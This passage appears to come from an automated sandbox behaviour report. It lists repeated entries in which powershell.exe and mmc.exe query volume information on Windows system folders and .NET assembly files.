Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35\MMCFxCommon.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35\MMCFxCommon.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35\Microsoft.ManagementConsole.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35\Microsoft.ManagementConsole.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\EventViewer\6.1.0.0__31bf3856ad364e35\EventViewer.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\EventViewer\6.1.0.0__31bf3856ad364e35\EventViewer.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\MiguiControls\1.0.0.0__31bf3856ad364e35\MIGUIControls.dll VolumeInformation |
Source: C:\Windows\System32\mmc.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\MiguiControls\1.0.0.0__31bf3856ad364e35\MIGUIControls.dll VolumeInformation |